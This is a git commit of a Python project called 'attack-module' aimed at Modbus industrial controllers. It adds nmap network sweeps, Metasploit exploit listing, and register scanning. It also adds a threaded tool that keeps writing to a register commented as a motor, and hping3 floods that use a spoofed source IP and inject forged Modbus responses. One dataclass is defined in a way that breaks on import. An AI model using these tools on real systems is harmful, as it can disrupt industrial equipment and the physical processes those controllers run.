This commit is contained in:
2025-06-02 14:53:26 +03:00
parent dc735acfd1
commit 91231b6a53
26 changed files with 4657 additions and 1 deletions

2
.gitignore vendored
View File

@ -106,7 +106,7 @@ ipython_config.py
# This is especially recommended for binary packages to ensure reproducibility, and is more
# commonly ignored for libraries.
# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
#poetry.lock
poetry.lock
# pdm
# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.

3
.idea/.gitignore generated vendored Normal file
View File

@ -0,0 +1,3 @@
# Default ignored files
/shelf/
/workspace.xml

8
.idea/attack_module.iml generated Normal file
View File

@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="PYTHON_MODULE" version="4">
<component name="NewModuleRootManager">
<content url="file://$MODULE_DIR$" />
<orderEntry type="jdk" jdkName="Python 3.13 virtualenv at ~/.cache/pypoetry/virtualenvs/attack-module-hzqUXjWu-py3.13" jdkType="Python SDK" />
<orderEntry type="sourceFolder" forTests="false" />
</component>
</module>

View File

@ -0,0 +1,6 @@
<component name="InspectionProjectProfileManager">
<settings>
<option name="USE_PROJECT_PROFILE" value="false" />
<version value="1.0" />
</settings>
</component>

7
.idea/misc.xml generated Normal file
View File

@ -0,0 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="Black">
<option name="sdkName" value="Python 3.13 virtualenv at ~/.cache/pypoetry/virtualenvs/attack-module-hzqUXjWu-py3.13" />
</component>
<component name="ProjectRootManager" version="2" project-jdk-name="Python 3.13 virtualenv at ~/.cache/pypoetry/virtualenvs/attack-module-hzqUXjWu-py3.13" project-jdk-type="Python SDK" />
</project>

8
.idea/modules.xml generated Normal file
View File

@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectModuleManager">
<modules>
<module fileurl="file://$PROJECT_DIR$/.idea/attack_module.iml" filepath="$PROJECT_DIR$/.idea/attack_module.iml" />
</modules>
</component>
</project>

6
.idea/vcs.xml generated Normal file
View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="VcsDirectoryMappings">
<mapping directory="" vcs="Git" />
</component>
</project>

0
data/database.db Normal file
View File

3064
data/nmap.json Normal file

File diff suppressed because it is too large Load Diff

25
pyproject.toml Normal file
View File

@ -0,0 +1,25 @@
[project]
name = "attack-module"
version = "0.1.0"
description = ""
authors = [
{name = "Yuri Dmitriev"}
]
readme = "README.md"
requires-python = ">=3.13,<4.0"
dependencies = [
"python3-nmap (>=1.9.1,<2.0.0)",
"pymetasploit3 (>=1.0.6,<2.0.0)",
"pymodbus (>=3.9.2,<4.0.0)",
"loguru (>=0.7.3,<0.8.0)",
"dbus-python (>=1.4.0,<2.0.0)",
"dearpygui (>=2.0.0,<3.0.0)"
]
[build-system]
requires = ["poetry-core>=2.0.0,<3.0.0"]
build-backend = "poetry.core.masonry.api"
[virtualenvs]
in-project = true

View File

@ -0,0 +1,51 @@
#!/usr/bin/env python3
from src.core.attacks.hping_test import Hping3Tester
from src.core.models.hping_test import HpingTestConfig
from random import randint
def main():
# Конфигурация теста Modbus TCP
# config = HpingTestConfig(
# target="192.168.1.55",
# test_type="tcp",
# interface="enp7s0f1",
# spoof_ip="192.168.1.151", # Спуфинг источника
# source_port=randint(45000,65535), # Порт источника
# dest_port=502, # Порт назначения (Modbus)
# dest_port_range=False, # Использовать диапазон портов назначения (++)
# packet_size=12, # Размер пакета
# #interval="u30", # Интервал 30 микросекунд
# flags="S", # Флаги PUSH + ACK (правильно: "P", "A")
# # raw_data="/home/user/raw/1.raw", # Сырые данные
# count=100,
# verbose=True,
# flood=True
# )
config = HpingTestConfig(
target="192.168.1.151",
test_type="tcp",
interface="enp7s0f1",
spoof_ip="192.168.1.55", # Спуфинг источника
source_port=randint(45000,65535), # Порт источника
dest_port=502, # Порт назначения (Modbus)
dest_port_range=False, # Использовать диапазон портов назначения (++)
packet_size=12, # Размер пакета
interval="u10000", # Интервал 30 микросекунд
flags="PA", # Флаги PUSH + ACK (правильно: "P", "A")
raw_data="/home/lodqa/attack_module_data/2_modbus_response.raw", # Сырые данные
count=10000,
verbose=True,
flood=False
)
# Запуск теста
tester = Hping3Tester(config)
stats = tester.run()
# Дополнительная обработка результатов
# ...
if __name__ == "__main__":
main()

View File

@ -0,0 +1,34 @@
#!/usr/bin/env python3
from src.core.attacks.modbus_load_test import ModbusLoadTester
from src.core.models.modbus_load_test import LoadTestConfig, WriteTask
def main():
# Конфигурация теста
config = LoadTestConfig(
host="192.168.1.55",
port=502,
threads=10,
duration=20, # 5 минут
tasks=[
# Мотор - запись в holding register
WriteTask(
data_type='holding_register',
address=100,
value=0,
interval=0.05,
count=0 # Бесконечно
)
]
)
# Запуск теста
tester = ModbusLoadTester(config)
stats = tester.run()
# Дополнительная обработка результатов
# ...
if __name__ == "__main__":
main()

0
src/core/api/__init__.py Normal file
View File

View File

@ -0,0 +1,20 @@
from pymetasploit3.msfrpc import MsfRpcClient
client = MsfRpcClient("makemesecurity", ssl=True)
result = {}
# print([m for m in client.modules.exploits])
for exploit in client.modules.exploits:
#print(exploit.split("/"))
system, area, name = exploit.split('/')
if system in result.keys():
if area in result[system].keys():
result[system][area].append(name)
else:
result[system][area] = [name]
else:
result[system] = {area: []}
print(result)

95
src/core/api/nmap.py Normal file
View File

@ -0,0 +1,95 @@
import re
import json
from typing import Any, Dict
import nmap3
from src.utils.logger import get_logger
logger = get_logger("nmap_scanner")
class NmapScanner:
def __init__(self, ip: str, args: str = "-sV"):
"""
Инициализация сканера Nmap
:param ip: целевой IP-адрес
:param args: аргументы для сканирования (по умолчанию: -sV)
"""
self.ip = ip
self.args = args
self.nmap = nmap3.Nmap()
logger.info(f"Инициализация NmapScanner для IP: {ip}, аргументы: {args}")
def start_scan(self) -> Dict[str, Any]:
"""
Запуск сканирования и возврат очищенных результатов
:return: словарь с разделенными результатами
"""
logger.info(f"🚀 Запуск сканирования Nmap для {self.ip} с аргументами: {self.args}")
try:
# Запуск сканирования с определением версий
scan_result = self.nmap.nmap_version_detection(self.ip, args=self.args)
logger.debug(f"Сырые результаты сканирования: {json.dumps(scan_result, indent=2)}")
# Очистка и структурирование результатов
cleaned_result = self.return_clear_result(scan_result)
logger.success(f"✅ Сканирование завершено для {self.ip}. Найдено хостов: {len(cleaned_result['hosts'])}")
return cleaned_result
except Exception as e:
logger.error(f"Ошибка при выполнении сканирования Nmap: {e}")
return {"hosts": {}, "service_info": {}}
@staticmethod
def return_clear_result(raw_data: Dict[str, Any]) -> Dict[str, Any]:
"""
Очистка и структурирование сырых данных от Nmap
:param raw_data: сырые данные от nmap_version_detection
:return: словарь с разделенными результатами
"""
logger.info("Начало обработки сырых данных Nmap")
try:
# Регулярное выражение для проверки IPv4
ip_pattern = re.compile(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$')
hosts = {}
service_info = {}
for key, value in raw_data.items():
# Проверяем, является ли ключ IP-адресом
if ip_pattern.match(key):
# Проверяем, в каком состоянии находится хост
if value.get('state', {}).get('state') == "up":
hosts[key] = value
logger.debug(f"Обнаружен активный хост: {key}")
else:
logger.debug(
f"Хост {key} не активен (состояние: {value.get('state', {}).get('state', 'unknown')})")
else:
service_info[key] = value
logger.info(
f"Обработка завершена. Активных хостов: {len(hosts)}, сервисная информация: {len(service_info)}")
return {
"hosts": hosts,
"service_info": service_info
}
except Exception as e:
logger.error(f"Ошибка при обработке данных Nmap: {e}")
return {"hosts": {}, "service_info": {}}
if __name__ == "__main__":
try:
scanner = NmapScanner("192.168.1.0/24", "-p 1-10000")
result = scanner.start_scan()
path = "/home/lodqa/attack_module_data/nmap.json"
logger.info(f"Сохранение результатов в файл: {path}")
with open(path, 'w', encoding='utf-8') as file:
json.dump(result, file, ensure_ascii=False, indent=4)
logger.success(f"Результаты успешно сохранены в {path}")
except Exception as e:
logger.error(f"Ошибка в главном блоке: {e}")

View File

@ -0,0 +1,213 @@
import subprocess
import shlex
import time
import os
import sys
from typing import Dict, Any, List
from src.core.models.hping_test import HpingTestConfig
from src.utils.logger import get_logger
logger = get_logger("hping_tester")
class Hping3Tester:
def __init__(self, config: HpingTestConfig):
self.config = config
self.process = None
self.start_time = 0
self.stats = {
'sent': 0,
'received': 0,
'loss_percent': 0.0,
'duration': 0.0,
'start_time': 0,
'end_time': 0
}
self.output_file = "/tmp/hping3_output.txt"
def build_command(self) -> List[str]:
"""Построение команды hping3"""
cmd = ["hping3"]
# Тип тестирования
if self.config.test_type == 'udp':
cmd.append("--udp")
elif self.config.test_type == 'icmp':
cmd.append("--icmp")
else: # TCP
if self.config.flags:
cmd.append(f"-{self.config.flags}")
# Порт источника
if self.config.source_port:
cmd.extend(["-s", str(self.config.source_port)])
# Порт назначения
if self.config.dest_port:
if self.config.dest_port_range:
cmd.extend(["-p", f"++{self.config.dest_port}"])
else:
cmd.extend(["-p", str(self.config.dest_port)])
# Спуфинг IP
if self.config.spoof_ip:
cmd.extend(["-a", self.config.spoof_ip])
# Сетевой интерфейс
if self.config.interface:
cmd.extend(["--interface", self.config.interface])
# Сырые данные
if self.config.raw_data:
cmd.extend(["--file", self.config.raw_data])
cmd.extend(["-d", str(self.config.packet_size)])
else:
cmd.extend(["-d", str(self.config.packet_size)])
# Количество пакетов
if self.config.count:
cmd.extend(["-c", str(self.config.count)])
# Режим флуда
if self.config.flood:
cmd.append("--flood")
else:
cmd.extend(["-i", self.config.interval])
# Подробный вывод
if self.config.verbose:
cmd.append("-V")
# Целевой адрес
cmd.append(self.config.target)
return cmd
def _is_graphical_environment(self) -> bool:
"""Проверка, доступна ли графическая среда."""
return bool(os.environ.get("DISPLAY") or os.environ.get("WAYLAND_DISPLAY"))
def _get_terminal_command(self) -> str:
"""Определение команды для терминала kitty."""
if subprocess.run(["which", "kitty"], capture_output=True).returncode == 0:
return "kitty"
logger.error("Terminal 'kitty' not found.")
return None
def run(self) -> Dict[str, Any]:
"""Запуск нагрузочного теста в новом терминале kitty"""
if not self._is_graphical_environment():
logger.error("Графическая среда недоступна. Запустите тест через терминал с sudo.")
return self.stats
command = self.build_command()
logger.info(f"🚀 Starting hping3 load test: {' '.join(command)}")
# Подготовка команды для запуска в kitty
terminal = self._get_terminal_command()
if not terminal:
logger.error("❌ Terminal 'kitty' not available. Test aborted.")
return self.stats
# Перенаправляем вывод в файл для последующего анализа
command_str = " ".join([shlex.quote(c) for c in command])
full_command = f"sudo {command_str} > {self.output_file} 2>&1"
try:
self.start_time = time.time()
self.stats['start_time'] = self.start_time
# Запускаем команду в kitty
terminal_cmd = ["kitty", "--", "bash", "-c", full_command]
logger.debug(f"Executing terminal command: {' '.join(terminal_cmd)}")
self.process = subprocess.Popen(
terminal_cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
# Ожидаем завершения процесса
while self.process.poll() is None:
time.sleep(1) # Проверяем каждую секунду
self.stats['end_time'] = time.time()
self.stats['duration'] = self.stats['end_time'] - self.stats['start_time']
# Читаем вывод из файла
if os.path.exists(self.output_file):
with open(self.output_file, 'r') as f:
stdout = f.read()
stderr = "" # Ошибки также перенаправлены в файл
os.remove(self.output_file) # Удаляем временный файл
else:
stdout = ""
stderr = "Output file not found."
logger.warning("No output file generated by hping3.")
# Анализ вывода
self._parse_output(stdout, stderr)
self._log_summary()
return self.stats
except Exception as e:
logger.error(f"Error running hping3 in kitty: {e}")
return self.stats
finally:
self.process = None
def stop(self):
"""Остановка нагрузочного теста"""
if self.process and self.process.poll() is None:
logger.info("🛑 Stopping hping3 test")
self.process.terminate()
try:
self.process.wait(timeout=5)
except subprocess.TimeoutExpired:
self.process.kill()
def _parse_output(self, stdout: str, stderr: str):
"""Анализ вывода hping3"""
if stderr:
logger.error(f"hping3 errors:\n{stderr}")
if stdout:
for line in stdout.split('\n'):
print(line)
if "packets tramitted" in line:
parts = line.split()
try:
print(parts)
self.stats['sent'] = int(parts[0])
self.stats['received'] = int(parts[3])
loss_percent = float(parts[6].replace('%', ''))
self.stats['loss_percent'] = loss_percent
except (IndexError, ValueError):
logger.warning("Failed to parse statistics line")
logger.debug(f"hping3 output:\n{stdout}")
def _log_summary(self):
"""Логирование результатов"""
loss_percent = self.stats.get('loss_percent', 0)
sent = self.stats.get('sent', 0)
received = self.stats.get('received', 0)
duration = self.stats.get('duration', 0)
if duration > 0:
pps = sent / duration
else:
pps = 0
logger.success("📊 hping3 test summary:")
logger.success(f" Target: {self.config.target}")
logger.success(f" Protocol: {self.config.test_type.upper()}")
logger.success(f" Packets sent: {sent}")
logger.success(f" Packets received: {received}")
logger.success(f" Packet loss: {loss_percent}%")
logger.success(f" Test duration: {duration:.2f} seconds")
logger.success(f" Packets per second: {pps:.2f} pps")
logger.success(f" Spoof IP: {self.config.spoof_ip or 'None'}")
logger.success(f" Flags: {self.config.flags or 'None'}")
logger.success(f" Flood mode: {'Yes' if self.config.flood else 'No'}")
logger.success(f" Interval: {self.config.interval if not self.config.flood else 'N/A (flood mode)'}")

View File

@ -0,0 +1,200 @@
import threading
import time
from pymodbus.client import ModbusTcpClient
from pymodbus.exceptions import ModbusException
from typing import List, Dict, Any, Optional
from queue import Queue
from src.utils.logger import get_logger
from src.core.models.modbus_load_test import LoadTestConfig, WriteTask, ModbusDataType
logger = get_logger("modbus_load_tester")
class ModbusLoadTester:
def __init__(self, config: LoadTestConfig):
"""
Инициализация нагрузочного тестера
:param config: Конфигурация теста
"""
self.config = config
self.task_queue = Queue()
self.threads = []
self.stop_event = threading.Event()
self.stats = {
'total_requests': 0,
'successful_requests': 0,
'failed_requests': 0,
'thread_errors': 0,
'start_time': 0.0,
'end_time': 0.0
}
# Заполняем очередь задач
for task in config.tasks:
for _ in range(task.count if task.count > 0 else 1):
self.task_queue.put(task)
def run(self) -> Dict[str, Any]:
"""
Запуск нагрузочного теста
"""
logger.info(f"🚀 Starting Modbus load test on {self.config.host}:{self.config.port}")
logger.info(f"Threads: {self.config.threads}, Duration: {self.config.duration} sec")
self.stats['start_time'] = time.time()
self.stop_event.clear()
# Создаем и запускаем потоки
for i in range(self.config.threads):
thread = threading.Thread(
target=self._worker_thread,
name=f"ModbusWorker-{i + 1}",
daemon=True
)
thread.start()
self.threads.append(thread)
# Запускаем таймер остановки
if self.config.duration > 0:
timer = threading.Timer(
self.config.duration,
self.stop
)
timer.start()
# Ожидаем завершения всех потоков
for thread in self.threads:
thread.join()
self.stats['end_time'] = time.time()
self._print_summary()
return self.stats
def stop(self):
"""
Остановка нагрузочного теста
"""
self.stop_event.set()
logger.info("🛑 Stopping load test")
def _worker_thread(self):
"""
Рабочий поток для выполнения задач
"""
thread_name = threading.current_thread().name
logger.debug(f"{thread_name} started")
client = None
try:
while not self.stop_event.is_set():
try:
# Получаем задачу из очереди
task = self.task_queue.get_nowait()
except Exception:
# Если очередь пуста, завершаем поток
break
try:
# Создаем подключение при необходимости
if client is None or not client.is_socket_open():
client = self._create_client()
# Выполняем запись
success = self._execute_write(client, task)
self.stats['total_requests'] += 1
if success:
self.stats['successful_requests'] += 1
else:
self.stats['failed_requests'] += 1
# Возвращаем задачу в очередь, если нужно повторять
if task.count == 0:
self.task_queue.put(task)
# Задержка перед следующей записью
time.sleep(task.interval)
except Exception as e:
logger.error(f"{thread_name} error: {e}")
self.stats['thread_errors'] += 1
client = None # Принудительное переподключение
time.sleep(1)
except Exception as e:
logger.error(f"Critical error in {thread_name}: {e}")
self.stats['thread_errors'] += 1
finally:
if client:
client.close()
logger.debug(f"{thread_name} exited")
def _create_client(self) -> ModbusTcpClient:
"""
Создание и подключение клиента Modbus
"""
client = ModbusTcpClient(
host=self.config.host,
port=self.config.port,
timeout=self.config.connection_timeout
)
if not client.connect():
raise ConnectionError(f"Failed to connect to {self.config.host}:{self.config.port}")
logger.debug(f"Connected to {self.config.host}:{self.config.port}")
return client
def _execute_write(self, client: ModbusTcpClient, task: WriteTask) -> bool:
"""
Выполнение операции записи
"""
try:
if task.data_type == 'coil':
result = client.write_coil(
address=task.address,
value=bool(task.value)
)
elif task.data_type == 'holding_register':
result = client.write_register(
address=task.address,
value=int(task.value)
)
else:
logger.warning(f"Unsupported data type: {task.data_type}")
return False
if result.isError():
logger.warning(
f"Write error: {task.data_type}@{task.address} = {task.value}"
)
return False
logger.debug(
f"Write success: {task.data_type}@{task.address} = {task.value}"
)
return True
except ModbusException as e:
logger.error(
f"Modbus error writing {task.data_type}@{task.address}: {e}"
)
return False
def _print_summary(self):
"""
Вывод статистики теста
"""
duration = self.stats['end_time'] - self.stats['start_time']
requests_per_sec = self.stats['total_requests'] / duration if duration > 0 else 0
logger.success("📊 Load test summary:")
logger.success(f" Total time: {duration:.2f} seconds")
logger.success(f" Total requests: {self.stats['total_requests']}")
logger.success(f" Successful requests: {self.stats['successful_requests']}")
logger.success(f" Failed requests: {self.stats['failed_requests']}")
logger.success(f" Thread errors: {self.stats['thread_errors']}")
logger.success(f" Requests per second: {requests_per_sec:.2f}")

View File

@ -0,0 +1,290 @@
import time
from pymodbus.client import ModbusTcpClient
from pymodbus.exceptions import ModbusException
from typing import Dict, Set, Tuple, Optional, Callable, Any
from pprint import pprint
from src.core.models.modbus_scan import ModbusScanResult
from src.utils.logger import get_logger
class ModbusScanner:
def __init__(
self,
host: str,
port: int = 502,
coil_range: Tuple[int, int] = (0, 100),
discrete_input_range: Tuple[int, int] = (0, 100),
holding_register_range: Tuple[int, int] = (0, 100),
input_register_range: Tuple[int, int] = (0, 100),
scan_duration: int = 10,
block_size: int = 50
):
"""
Сканер Modbus устройств
:param host: IP-адрес устройства
:param port: Порт Modbus (по умолчанию 502)
:param coil_range: Диапазон сканирования Coils (start, end)
:param discrete_input_range: Диапазон сканирования Discrete Inputs (start, end)
:param holding_register_range: Диапазон сканирования Holding Registers (start, end)
:param input_register_range: Диапазон сканирования Input Registers (start, end)
:param scan_duration: Длительность сканирования в секундах
:param block_size: Размер блока для чтения за один запрос
"""
self.host = host
self.port = port
self.coil_range = coil_range
self.discrete_input_range = discrete_input_range
self.holding_register_range = holding_register_range
self.input_register_range = input_register_range
self.scan_duration = scan_duration
self.block_size = block_size
self.client = None
self.logger = get_logger("modbus_scanner")
def connect(self) -> bool:
"""Подключение к устройству"""
self.logger.debug(f"Connecting to {self.host}:{self.port}")
try:
self.client = ModbusTcpClient(
host=self.host,
port=self.port,
timeout=2
)
connected = self.client.connect()
if connected:
self.logger.success(f"Connected to {self.host}:{self.port}")
else:
self.logger.error(f"Connection failed to {self.host}:{self.port}")
return connected
except Exception as e:
self.logger.opt(exception=True).error(f"Connection error: {e}")
return False
def disconnect(self):
"""Отключение от устройства"""
if self.client:
self.client.close()
self.logger.debug(f"Disconnected from {self.host}:{self.port}")
def scan_registers(self) -> Optional[ModbusScanResult]:
"""Основной метод сканирования всех типов регистров"""
self.logger.info(f"Starting Modbus scan on {self.host}:{self.port}")
self.logger.debug(f"Scan parameters: "
f"coils={self.coil_range}, "
f"discrete_inputs={self.discrete_input_range}, "
f"holding_registers={self.holding_register_range}, "
f"input_registers={self.input_register_range}, "
f"duration={self.scan_duration}s, "
f"block_size={self.block_size}")
if not self.connect():
return None
start_time = time.time()
# Словари для хранения активных регистров (адрес -> последнее значение)
active_coils: Dict[int, bool] = {}
active_discrete_inputs: Dict[int, bool] = {}
active_holding_registers: Dict[int, int] = {}
active_input_registers: Dict[int, int] = {}
# Множества для отслеживания активности (адрес -> было ли ненулевое значение)
activity_tracker: Dict[str, Set[int]] = {
'coil': set(),
'discrete_input': set(),
'holding_register': set(),
'input_register': set()
}
try:
scan_count = 0
while time.time() - start_time < self.scan_duration:
scan_count += 1
self.logger.debug(f"Scan iteration #{scan_count}")
# Сканируем Coils (0x)
self._scan_block(
read_func=self.client.read_coils,
address_range=self.coil_range,
active_values=active_coils,
activity_tracker=activity_tracker['coil'],
reg_type="coil",
is_register=False
)
# Сканируем Discrete Inputs (1x)
self._scan_block(
read_func=self.client.read_discrete_inputs,
address_range=self.discrete_input_range,
active_values=active_discrete_inputs,
activity_tracker=activity_tracker['discrete_input'],
reg_type="discrete_input",
is_register=False
)
# Сканируем Holding Registers (4x)
self._scan_block(
read_func=self.client.read_holding_registers,
address_range=self.holding_register_range,
active_values=active_holding_registers,
activity_tracker=activity_tracker['holding_register'],
reg_type="holding_register",
is_register=True
)
# Сканируем Input Registers (3x) - Holding Registers (Read-Only)
self._scan_block(
read_func=self.client.read_input_registers,
address_range=self.input_register_range,
active_values=active_input_registers,
activity_tracker=activity_tracker['input_register'],
reg_type="input_register",
is_register=True
)
time.sleep(0.5)
# Формируем результаты
result = ModbusScanResult(
ip_address=f"{self.host}:{self.port}",
active_coils=active_coils,
active_discrete_inputs=active_discrete_inputs,
active_holding_registers=active_holding_registers,
active_input_registers=active_input_registers
)
self.logger.success(
f"Scan completed in {scan_count} iterations. "
f"Active coils: {len(active_coils)}, "
f"Active discrete inputs: {len(active_discrete_inputs)}, "
f"Active holding registers: {len(active_holding_registers)}, "
f"Active input registers: {len(active_input_registers)}"
)
return result
except ModbusException as e:
self.logger.opt(exception=True).error(f"Modbus error: {e}")
return None
finally:
self.disconnect()
def _scan_block(
self,
read_func: Callable,
address_range: Tuple[int, int],
active_values: Dict[int, Any],
activity_tracker: Set[int],
reg_type: str,
is_register: bool = False
):
"""
Сканирование блока адресов
:param read_func: Функция чтения регистров
:param address_range: Диапазон адресов (start, end)
:param active_values: Словарь для хранения активных регистров
:param activity_tracker: Множество для отслеживания активности
:param reg_type: Тип регистра (для логирования)
:param is_register: Флаг для регистров (16-битные значения)
"""
start_addr, end_addr = address_range
current_addr = start_addr
while current_addr <= end_addr:
count_val = min(self.block_size, end_addr - current_addr + 1)
# Проверяем активность подключения
if not self.client.is_socket_open():
self.logger.warning("Connection lost during scan, reconnecting...")
if not self.connect():
self.logger.error("Reconnection failed, aborting scan")
break
try:
# Чтение блока регистров
response = read_func(address=current_addr, count=count_val)
if response.isError():
self.logger.warning(
f"Error reading {reg_type} at address {current_addr}"
)
current_addr += count_val
continue
# Получаем значения
if is_register:
values = response.registers
else:
values = response.bits
# Обрабатываем каждое значение в блоке
for i, value in enumerate(values):
addr = current_addr + i
# Если адрес выходит за верхнюю границу, прерываем
if addr > end_addr:
break
# Для регистров преобразуем в знаковое целое
if is_register and value >= 0x8000:
value = value - 0x10000
# Определяем активность
is_active = False
# Регистр считается активным если:
# 1. Текущее значение не нулевое
# 2. Или ранее было ненулевое значение (даже если сейчас 0)
if value != 0:
is_active = True
# Запоминаем что этот адрес когда-либо был активен
activity_tracker.add(addr)
elif addr in activity_tracker:
# Если ранее было ненулевое значение
is_active = True
# Обновляем значение только для активных регистров
if is_active:
active_values[addr] = value
elif addr in active_values:
# Удаляем неактивные регистры
del active_values[addr]
except ModbusException as e:
self.logger.opt(exception=True).error(
f"Error reading {reg_type} at {current_addr}: {e}"
)
current_addr += count_val
continue
current_addr += count_val
if __name__ == "__main__":
host = "192.168.1.55"
logger = get_logger("modbus_scan")
scanner = ModbusScanner(
host=host,
coil_range=(0, 1000), # 0x - Coils
discrete_input_range=(0, 1000), # 1x - Discrete Inputs
holding_register_range=(0, 1000), # 4x - Holding Registers
input_register_range=(0, 1000), # 3x - Input Registers
scan_duration=15,
block_size=125 # Максимальный размер блока для Modbus
)
result = scanner.scan_registers()
if result:
logger.success(
f"✅ Modbus scan completed. "
f"Coils: {len(result.active_coils)}, "
f"Discrete Inputs: {len(result.active_discrete_inputs)}, "
f"Holding Registers: {len(result.active_holding_registers)}, "
f"Input Registers: {len(result.active_input_registers)}"
)
else:
logger.error("❌ Modbus scan failed")
pprint(result)

View File

@ -0,0 +1,121 @@
import sqlite3
from typing import List, Dict, Any
from src.utils.logger import get_logger
logger = get_logger("sqlite_db")
class SQLiteDB:
def __init__(self, db_path: str):
"""Инициализация соединения с базой данных."""
self.db_path = db_path
self._create_tables()
logger.info(f"Инициализация базы данных SQLite: {db_path}")
def _create_tables(self):
"""Создание таблиц в базе данных."""
try:
with sqlite3.connect(self.db_path) as conn:
cursor = conn.cursor()
# Таблица для хостов
cursor.execute("""
CREATE TABLE IF NOT EXISTS hosts (
id INTEGER PRIMARY KEY AUTOINCREMENT,
ip TEXT NOT NULL UNIQUE,
state TEXT NOT NULL,
scan_timestamp TEXT NOT NULL
)
""")
# Таблица для портов
cursor.execute("""
CREATE TABLE IF NOT EXISTS ports (
id INTEGER PRIMARY KEY AUTOINCREMENT,
host_id INTEGER NOT NULL,
port INTEGER NOT NULL,
protocol TEXT,
state TEXT,
service TEXT,
version TEXT,
FOREIGN KEY (host_id) REFERENCES hosts(id) ON DELETE CASCADE
)
""")
conn.commit()
logger.info("Таблицы успешно созданы или уже существуют")
except sqlite3.Error as e:
logger.error(f"Ошибка при создании таблиц: {e}")
raise
def save_scan_results(self, scan_results: Dict[str, Any]):
"""Сохранение результатов сканирования в базу данных."""
try:
with sqlite3.connect(self.db_path) as conn:
cursor = conn.cursor()
# Сохранение хостов
for ip, data in scan_results["hosts"].items():
state = data.get("state", {}).get("state", "unknown")
timestamp = data.get("scan_timestamp", "unknown")
cursor.execute(
"INSERT OR REPLACE INTO hosts (ip, state, scan_timestamp) VALUES (?, ?, ?)",
(ip, state, timestamp)
)
host_id = cursor.lastrowid if cursor.lastrowid else cursor.execute(
"SELECT id FROM hosts WHERE ip = ?", (ip,)
).fetchone()[0]
# Сохранение портов
ports = data.get("ports", [])
for port_data in ports:
cursor.execute(
"""
INSERT INTO ports (host_id, port, protocol, state, service, version)
VALUES (?, ?, ?, ?, ?, ?)
""",
(
host_id,
port_data.get("portid"),
port_data.get("protocol"),
port_data.get("state"),
port_data.get("service", {}).get("name"),
port_data.get("service", {}).get("version")
)
)
conn.commit()
logger.info(f"Результаты сканирования сохранены для {len(scan_results['hosts'])} хостов")
except sqlite3.Error as e:
logger.error(f"Ошибка при сохранении результатов: {e}")
raise
def get_all_hosts(self) -> List[Dict[str, Any]]:
"""Получение всех хостов из базы данных."""
try:
with sqlite3.connect(self.db_path) as conn:
cursor = conn.cursor()
cursor.execute("SELECT * FROM hosts")
hosts = [{"id": row[0], "ip": row[1], "state": row[2], "scan_timestamp": row[3]} for row in cursor.fetchall()]
logger.info(f"Извлечено {len(hosts)} хостов из базы данных")
return hosts
except sqlite3.Error as e:
logger.error(f"Ошибка при получении хостов: {e}")
return []
def get_ports_by_host_id(self, host_id: int) -> List[Dict[str, Any]]:
"""Получение портов для указанного хоста."""
try:
with sqlite3.connect(self.db_path) as conn:
cursor = conn.cursor()
cursor.execute("SELECT * FROM ports WHERE host_id = ?", (host_id,))
ports = [
{
"id": row[0],
"host_id": row[1],
"port": row[2],
"protocol": row[3],
"state": row[4],
"service": row[5],
"version": row[6]
}
for row in cursor.fetchall()
]
logger.debug(f"Извлечено {len(ports)} портов для хоста с ID {host_id}")
return ports
except sqlite3.Error as e:
logger.error(f"Ошибка при получении портов для хоста {host_id}: {e}")
return []

77
src/core/models/host.py Normal file
View File

@ -0,0 +1,77 @@
from dataclasses import dataclass
from typing import Dict, List, Optional, Any
@dataclass
class CPE:
cpe: str
@dataclass
class Service:
name: str
product: Optional[str] = None
version: Optional[str] = None
extrainfo: Optional[str] = None
ostype: Optional[str] = None
method: str
conf: str
@dataclass
class Port:
protocol: str
portid: str
state: str
reason: str
reason_ttl: str
service: Optional[Service] = None
cpe: List[CPE] = None
scripts: List[Any] = None
def __post_init__(self):
if self.cpe is None:
self.cpe = []
if self.scripts is None:
self.scripts = []
@dataclass
class HostState:
state: str
reason: str
reason_ttl: str
@dataclass
class HostInfo:
osmatch: Dict[str, Any]
ports: List[Port]
hostname: List[Any]
macaddress: Optional[str]
state: HostState
@dataclass
class TaskResult:
task: str
time: str
extrainfo: Optional[str] = None
@dataclass
class Runtime:
time: str
timestr: str
summary: str
elapsed: str
exit: str
@dataclass
class Stats:
scanner: str
args: str
start: str
startstr: str
version: str
xmloutputversion: str
@dataclass
class NmapReport:
hosts: Dict[str, HostInfo]
runtime: Runtime
stats: Stats
task_results: List[TaskResult]

View File

@ -0,0 +1,19 @@
from dataclasses import dataclass
from typing import Optional, Literal
@dataclass
class HpingTestConfig:
target: str
test_type: Literal['tcp', 'udp', 'icmp'] = 'tcp'
interface: Optional[str] = None
spoof_ip: Optional[str] = None
source_port: int = 502
dest_port: Optional[int] = None
dest_port_range: bool = False
packet_size: int = 64
interval: str = 'u1000'
flags: Optional[str] = None # Комбинированные флаги: "SA", "PA", "FA" и т.д.
raw_data: Optional[str] = None
count: Optional[int] = None
verbose: bool = False
flood: bool = False

View File

@ -0,0 +1,28 @@
from dataclasses import dataclass, field
from typing import List, Dict, Union, Literal
ModbusDataType = Literal['coil', 'holding_register']
@dataclass
class WriteTask:
"""
Задача на запись в Modbus устройство
"""
data_type: ModbusDataType
address: int
value: Union[bool, int]
interval: float = 0.1 # Интервал между записями в секундах
count: int = 1 # Количество повторов (0 = бесконечно)
@dataclass
class LoadTestConfig:
"""
Конфигурация нагрузочного теста
"""
host: str
port: int = 502
threads: int = 5 # Количество потоков
duration: float = 60.0 # Длительность теста в секундах
tasks: List[WriteTask] = field(default_factory=list)
auto_reconnect: bool = True # Автоматическое переподключение
connection_timeout: float = 2.0 # Таймаут подключения

View File

@ -0,0 +1,24 @@
from dataclasses import dataclass
from typing import Dict, Any
@dataclass
class ModbusScanResult:
"""
Результаты сканирования Modbus устройства
Содержит только активные регистры
"""
ip_address: str
active_coils: Dict[int, bool] # Активные Coils: адрес -> значение
active_discrete_inputs: Dict[int, bool] # Активные Discrete Inputs
active_holding_registers: Dict[int, int] # Активные Holding Registers
active_input_registers: Dict[int, int] # Активные Input Registers
